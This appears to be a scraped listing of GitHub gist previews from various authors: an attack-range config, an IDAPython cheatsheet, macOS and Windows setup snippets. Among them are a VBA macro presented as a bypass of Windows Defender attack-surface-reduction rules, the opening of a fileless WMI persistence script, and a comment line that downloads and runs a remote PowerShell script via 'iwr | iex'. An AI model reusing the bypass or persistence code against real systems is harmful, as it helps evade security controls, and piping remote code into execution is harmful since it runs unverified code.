mvelazc0

general:
  cloud_provider: aws
  attack_range_password: AW^@#^%&^#@##
  use_prebuilt_images_with_packer: '0'
  key_name: yourkey-001423
  ip_whitelist: 8.8.8.8 #your public ip address
  attack_range_name: test-range
aws:
  private_key_path: /Users/your/key-001423.key
  region: us-west-2

vocaeq

#include <dlfcn.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <mach/mach.h>
#include <mach/error.h>
#include <errno.h>
#include <stdlib.h>
#include <sys/sysctl.h>
#include <sys/mman.h>

icecr4ck

IDAPython cheatsheet

Important links

• Porting IDAPython plugins to IDA 7.4
• Hex-Rays IDAPython official documentation

Basic commands

Get informations on the binary

infosecn1nja

' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule

Sub ASR_blocked()
    Dim WSHShell As Object
    Set WSHShell = CreateObject("Wscript.Shell")
    WSHShell.Run "cmd.exe"
End Sub

mikepruett3

<#
.SYNOPSIS
    Script to Initialize my custom powershell setup.
.DESCRIPTION
    Script uses scoop
.NOTES
    **NOTE** Will configure the Execution Policy for the "CurrentUser" to Unrestricted.

    Author: Mike Pruett
    Date: October 18th, 2018

infosecn1nja

# Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
# https://wikileaks.org/ciav7p1/cms/page_14587908.html

<#
.SYNOPSIS
This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds.  The event will trigger only once.  
#>

$EventFilterName = "Fileless WMI Persistence SystemUptime"

cprovatas

let callback: CGEventTapCallBack =  { (tapProxy, eventType, event, refcon) -> Unmanaged<CGEvent>? in
    debugPrint("we are monitoring the mouse event here")
    return nil
}

let eventMask = (1 << CGEventType.leftMouseDown.rawValue) | (1 << CGEventType.leftMouseUp.rawValue)
let machPort = CGEvent.tapCreateForPid(pid: 40529, place: .tailAppendEventTap, options: .defaultTap, eventsOfInterest: CGEventMask(eventMask), callback: callback, userInfo: nil)!


let runLoopSource = CFMachPortCreateRunLoopSource(kCFAllocatorDefault, machPort, 0)

alirobe

### 
###
### UPDATE: For Win 11, I recommend using this tool in place of this script: 
### https://christitus.com/windows-tool/
### https://github.com/ChrisTitusTech/winutil
### https://www.youtube.com/watch?v=6UQZ5oQg8XA
### iwr -useb https://christitus.com/win | iex
###
### OR take a look at 
### https://github.com/HotCakeX/Harden-Windows-Security

xbeta

http://stackoverflow.com/questions/24380159/corebluetooth-and-wifi-interference

http://lists.apple.com/archives/bluetooth-dev/2013/Aug/msg00023.html

This is a well known issue, and it has a solution that is confirmed to work for the Mac side.

sudo defaults write /Library/Preferences/com.apple.airport.bt.plist bluetoothCoexMgmt Hybrid

After you run this script, the issue will go away and BT connections will remain stable.